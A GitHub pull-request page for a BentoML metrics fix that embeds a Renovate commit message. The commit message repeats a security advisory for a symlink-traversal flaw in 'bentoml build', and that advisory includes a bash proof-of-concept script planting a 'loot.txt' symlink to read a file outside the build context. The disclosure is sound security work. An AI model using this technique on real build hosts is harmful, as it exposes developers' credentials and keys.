fix: defer prometheus_client import in bentoml.metrics to fix histogram collection in multiprocess mode#5602
Merged
frostming merged 2 commits intoApr 30, 2026
Conversation
…am collection in multiprocess mode Fixes bentoml#5056. ## Root cause `bentoml.metrics` previously executed `sys.modules[__name__] = prometheus_client` at import time, which caused `prometheus_client` to be imported immediately when user service code did `from bentoml.metrics import Histogram`. BentoML loads the service module in the parent process *before* forking workers. Workers set `PROMETHEUS_MULTIPROC_DIR` in `os.environ` during startup, but by that point `prometheus_client` had already been imported without the env var and had initialised in single-process mode. Any `Histogram` or `Counter` objects created afterwards wrote to the in-process registry, not the file-backed multiprocess one, so `MultiProcessCollector` (used by BentoML's `/metrics` endpoint) saw nothing from them. When multiple `Histogram` objects were declared, the symptom manifested as "only the last declared histogram is collected" because the collection code happened to pick up one metric through a different path, masking the full scope of the data loss. ## Fix Replace the eager `sys.modules` shim with a `__getattr__` lazy loader. `prometheus_client` is now imported the first time an attribute (e.g. `Histogram`) is accessed, which happens *after* the worker has already set `PROMETHEUS_MULTIPROC_DIR`. The resolved attribute is then cached in the module globals so subsequent accesses skip `__getattr__` entirely. ## Tests Two new unit tests in `tests/unit/test_metrics_deferred_import.py`: - `test_bentoml_metrics_does_not_import_prometheus_client_eagerly`: asserts that importing `bentoml.metrics` does not pull in `prometheus_client`. - `test_multiple_histograms_all_collected_in_multiprocess_mode`: full regression test confirming all three histograms from the issue report are visible to `MultiProcessCollector` after the worker sets the env var.
For more information, see https://pre-commit.ci
frostming
approved these changes
Apr 29, 2026
renovate Bot
added a commit
to yxtay/agentic-recommenders
that referenced
this pull request
May 7, 2026
This PR contains the following updates: | Package | Type | Update | Change | OpenSSF | |---|---|---|---|---| | [bentoml](https://redirect.github.com/bentoml/bentoml) | project.dependencies | patch | `1.4.38` → `1.4.39` | [](https://securityscorecards.dev/viewer/?uri=github.com/bentoml/bentoml) | --- > [!WARNING] > Some dependencies could not be looked up. Check the [Dependency Dashboard](../issues/12) for more information. --- ### BentoML has Information Disclosure in `bentoml build` via symlink traversal in the build context [CVE-2026-40610](https://nvd.nist.gov/vuln/detail/CVE-2026-40610) / [GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv) <details> <summary>More information</summary> #### Details ##### Summary BentoML's `bentoml build` packaging workflow follows attacker-controlled symlinks inside the build context and copies the referenced file contents into the generated Bento artifact. If a victim builds an untrusted repository or other attacker-supplied build context, the attacker can place a symlink such as `loot.txt -> /tmp/outside-marker.txt` or a link to a more sensitive local file. When `bentoml build` runs, BentoML dereferences the symlink and packages the target file contents into the Bento. The leaked file can then propagate further through export, push, or containerization workflows. ##### Details The vulnerable code walks files under the build context and copies each matched entry into the Bento source directory: ```python for root, _, files in os.walk(ctx_path): for f in files: dir_path = os.path.relpath(root, ctx_path) path = os.path.join(dir_path, f).replace(os.sep, "/") if specs.includes(path): src_file = ctx_path.joinpath(path) dst_file = target_fs.joinpath(dest_path) shutil.copy(src_file, dst_file) ``` There is no validation that the resolved path of `src_file` remains inside `ctx_path` before `shutil.copy` dereferences the source path. As a result, a repository-controlled symlink can cross the trust boundary from `attacker-controlled repository content` to `developer/CI host filesystem` during the build process. This is a build-time path traversal / symlink traversal issue in the packaging feature, not a runtime API issue. The resulting Bento may later be exported, pushed to remote storage, or converted into a container image, which amplifies the leakage impact. ##### PoC The issue was verified in WSL against BentoML 1.4.38. The following script reproduces the vulnerability by using a harmless marker file outside the build directory. ```bash mkdir -p /tmp/bento-symlink-poc cd /tmp/bento-symlink-poc printf 'BENTOML_SYMLINK_POC_123456\n' > /tmp/outside-marker.txt cat > service.py <<'EOF' import bentoml @​bentoml.service class Demo: @​bentoml.api def ping(self, x: str) -> str: return x EOF cat > bentofile.yaml <<'EOF' service: "service:Demo" include: - "service.py" - "loot.txt" EOF ln -s /tmp/outside-marker.txt loot.txt bentoml build --output tag bentoml export demo:7pilrpjtlomelwct /tmp/poc.zip mkdir -p /tmp/poc-unzip unzip -o /tmp/poc.zip -d /tmp/poc-unzip find /tmp/poc-unzip -name loot.txt -print cat /tmp/poc-unzip/**/src/loot.txt 2>/dev/null || \ find /tmp/poc-unzip -path '*/src/loot.txt' -exec cat {} \; ``` - The script creates `/tmp/outside-marker.txt` outside the build context as a stand-in for a sensitive local file. - It creates a minimal BentoML service and explicitly includes `loot.txt` in `bentofile.yaml`. - It creates `loot.txt` as a symlink to the external marker file. <img width="1531" height="648" alt="image" src="https://github.com/user-attachments/assets/1312dcf0-74b0-4fb6-a05d-b68644470d82" /> - It runs `bentoml build`, exports the generated Bento, unzips it, and reads the packaged `src/loot.txt`. - Successful exploitation is confirmed when the packaged file contains `BENTOML_SYMLINK_POC_123456`, proving that BentoML copied the external file contents rather than keeping only the symlink. <img width="1315" height="121" alt="image" src="https://github.com/user-attachments/assets/6ed34f51-9b68-4fa9-8a42-011deb84d54e" /> <img width="1697" height="760" alt="image" src="https://github.com/user-attachments/assets/9b8a8ae5-4f06-46b4-9e4a-dee25cc5d203" /> ##### Impact An attacker who can cause a developer, release engineer, or CI system to run `bentoml build` on an attacker-controlled repository can exfiltrate local files from the build host into the Bento artifact. This can expose secrets such as cloud credentials, SSH keys, API tokens, environment files, or other sensitive local configuration. Because Bento artifacts are commonly exported, uploaded, stored, or containerized after build, the leaked file contents can spread beyond the original build machine. #### Severity - CVSS Score: 5.5 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N` #### References - [https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv) - [https://github.com/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### BentoML has Information Disclosure in `bentoml build` via symlink traversal in the build context [CVE-2026-40610](https://nvd.nist.gov/vuln/detail/CVE-2026-40610) / [GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/advisories/GHSA-mcfx-4vc6-qgxv) <details> <summary>More information</summary> #### Details ##### Summary BentoML's `bentoml build` packaging workflow follows attacker-controlled symlinks inside the build context and copies the referenced file contents into the generated Bento artifact. If a victim builds an untrusted repository or other attacker-supplied build context, the attacker can place a symlink such as `loot.txt -> /tmp/outside-marker.txt` or a link to a more sensitive local file. When `bentoml build` runs, BentoML dereferences the symlink and packages the target file contents into the Bento. The leaked file can then propagate further through export, push, or containerization workflows. ##### Details The vulnerable code walks files under the build context and copies each matched entry into the Bento source directory: ```python for root, _, files in os.walk(ctx_path): for f in files: dir_path = os.path.relpath(root, ctx_path) path = os.path.join(dir_path, f).replace(os.sep, "/") if specs.includes(path): src_file = ctx_path.joinpath(path) dst_file = target_fs.joinpath(dest_path) shutil.copy(src_file, dst_file) ``` There is no validation that the resolved path of `src_file` remains inside `ctx_path` before `shutil.copy` dereferences the source path. As a result, a repository-controlled symlink can cross the trust boundary from `attacker-controlled repository content` to `developer/CI host filesystem` during the build process. This is a build-time path traversal / symlink traversal issue in the packaging feature, not a runtime API issue. The resulting Bento may later be exported, pushed to remote storage, or converted into a container image, which amplifies the leakage impact. ##### PoC The issue was verified in WSL against BentoML 1.4.38. The following script reproduces the vulnerability by using a harmless marker file outside the build directory. ```bash mkdir -p /tmp/bento-symlink-poc cd /tmp/bento-symlink-poc printf 'BENTOML_SYMLINK_POC_123456\n' > /tmp/outside-marker.txt cat > service.py <<'EOF' import bentoml @​bentoml.service class Demo: @​bentoml.api def ping(self, x: str) -> str: return x EOF cat > bentofile.yaml <<'EOF' service: "service:Demo" include: - "service.py" - "loot.txt" EOF ln -s /tmp/outside-marker.txt loot.txt bentoml build --output tag bentoml export demo:7pilrpjtlomelwct /tmp/poc.zip mkdir -p /tmp/poc-unzip unzip -o /tmp/poc.zip -d /tmp/poc-unzip find /tmp/poc-unzip -name loot.txt -print cat /tmp/poc-unzip/**/src/loot.txt 2>/dev/null || \ find /tmp/poc-unzip -path '*/src/loot.txt' -exec cat {} \; ``` - The script creates `/tmp/outside-marker.txt` outside the build context as a stand-in for a sensitive local file. - It creates a minimal BentoML service and explicitly includes `loot.txt` in `bentofile.yaml`. - It creates `loot.txt` as a symlink to the external marker file. <img width="1531" height="648" alt="image" src="https://github.com/user-attachments/assets/1312dcf0-74b0-4fb6-a05d-b68644470d82" /> - It runs `bentoml build`, exports the generated Bento, unzips it, and reads the packaged `src/loot.txt`. - Successful exploitation is confirmed when the packaged file contains `BENTOML_SYMLINK_POC_123456`, proving that BentoML copied the external file contents rather than keeping only the symlink. <img width="1315" height="121" alt="image" src="https://github.com/user-attachments/assets/6ed34f51-9b68-4fa9-8a42-011deb84d54e" /> <img width="1697" height="760" alt="image" src="https://github.com/user-attachments/assets/9b8a8ae5-4f06-46b4-9e4a-dee25cc5d203" /> ##### Impact An attacker who can cause a developer, release engineer, or CI system to run `bentoml build` on an attacker-controlled repository can exfiltrate local files from the build host into the Bento artifact. This can expose secrets such as cloud credentials, SSH keys, API tokens, environment files, or other sensitive local configuration. Because Bento artifacts are commonly exported, uploaded, stored, or containerized after build, the leaked file contents can spread beyond the original build machine. #### Severity - CVSS Score: 5.5 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N` #### References - [https://github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv](https://redirect.github.com/bentoml/BentoML/security/advisories/GHSA-mcfx-4vc6-qgxv) - [https://github.com/bentoml/BentoML](https://redirect.github.com/bentoml/BentoML) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-mcfx-4vc6-qgxv) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>bentoml/bentoml (bentoml)</summary> ### [`v1.4.39`](https://redirect.github.com/bentoml/BentoML/releases/tag/v1.4.39) [Compare Source](https://redirect.github.com/bentoml/bentoml/compare/v1.4.38...v1.4.39) ##### What's Changed - ci: pre-commit autoupdate \[skip ci] by [@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot] in [bentoml/BentoML#5593](https://redirect.github.com/bentoml/BentoML/pull/5593) - fix: prevent following symlinks when copying files in BentoStore by [@​frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5598](https://redirect.github.com/bentoml/BentoML/pull/5598) - fix: add sharing=locked to BuildKit cache mounts for multi-arch builds by [@​lawrence3699](https://redirect.github.com/lawrence3699) in [bentoml/BentoML#5597](https://redirect.github.com/bentoml/BentoML/pull/5597) - fix: enhance Dockerfile generation by normalizing base image lines and adding tests by [@​frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5603](https://redirect.github.com/bentoml/BentoML/pull/5603) - fix: defer prometheus\_client import in bentoml.metrics to fix histogram collection in multiprocess mode by [@​ramkrishs](https://redirect.github.com/ramkrishs) in [bentoml/BentoML#5602](https://redirect.github.com/bentoml/BentoML/pull/5602) - ci: pre-commit autoupdate \[skip ci] by [@​pre-commit-ci](https://redirect.github.com/pre-commit-ci)\[bot] in [bentoml/BentoML#5605](https://redirect.github.com/bentoml/BentoML/pull/5605) - fix: handle string input in FileSchema by encoding to UTF-8 by [@​frostming](https://redirect.github.com/frostming) in [bentoml/BentoML#5606](https://redirect.github.com/bentoml/BentoML/pull/5606) ##### New Contributors - [@​lawrence3699](https://redirect.github.com/lawrence3699) made their first contribution in [bentoml/BentoML#5597](https://redirect.github.com/bentoml/BentoML/pull/5597) - [@​ramkrishs](https://redirect.github.com/ramkrishs) made their first contribution in [bentoml/BentoML#5602](https://redirect.github.com/bentoml/BentoML/pull/5602) **Full Changelog**: <bentoml/BentoML@v1.4.38...v1.4.39> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - "" - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/yxtay/agentic-recommenders). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4xNTkuMiIsInVwZGF0ZWRJblZlciI6IjQzLjE1OS4yIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJzZWN1cml0eSJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
What does this PR address?
Fixes #5056 — when multiple
Histogramobjects are declared usingbentoml.metrics, only the last one appears in the/metricsendpoint output.Root cause
bentoml.metricspreviously ransys.modules[__name__] = prometheus_clientat import time. This meantprometheus_clientwas imported the moment user service code wrotefrom bentoml.metrics import Histogram— which happens at service-module load time in the parent process, before any worker is forked.Workers set
PROMETHEUS_MULTIPROC_DIRinos.environduring startup. But sinceprometheus_clientwas already imported without this env var, it had initialised in single-process mode. AnyHistogramorCounterobjects created afterwards wrote to the in-process registry, not the file-backed multiprocess one.MultiProcessCollector— which BentoML's/metricsendpoint uses — reads from those files and therefore saw none of the user-defined metrics.The "only last histogram collected" symptom was incidental: the collection path happened to surface one metric through a separate mechanism, masking the true scope of data loss.
Fix
Replace the eager
sys.modulesshim with a__getattr__lazy loader insrc/bentoml/metrics.py.prometheus_clientis now imported the first time an attribute is accessed (e.g.bentoml.metrics.Histogram), which happens after the worker has already setPROMETHEUS_MULTIPROC_DIR. The resolved attribute is cached in the module globals so subsequent accesses are free.Tests
Two new unit tests in
tests/unit/test_metrics_deferred_import.py:test_bentoml_metrics_does_not_import_prometheus_client_eagerly— asserts thatimport bentoml.metricsdoes not pull inprometheus_client.test_multiple_histograms_all_collected_in_multiprocess_mode— full regression: creates threeHistogramobjects after settingPROMETHEUS_MULTIPROC_DIR, then verifies all three are visible toMultiProcessCollector. This is the exact scenario from the issue report.Notes
DeprecationWarningfrombentoml.metricsis preserved — it fires on first attribute access, which is the first point where user code actually interacts with the module.prometheus_clientsymbols are still accessible throughbentoml.metrics.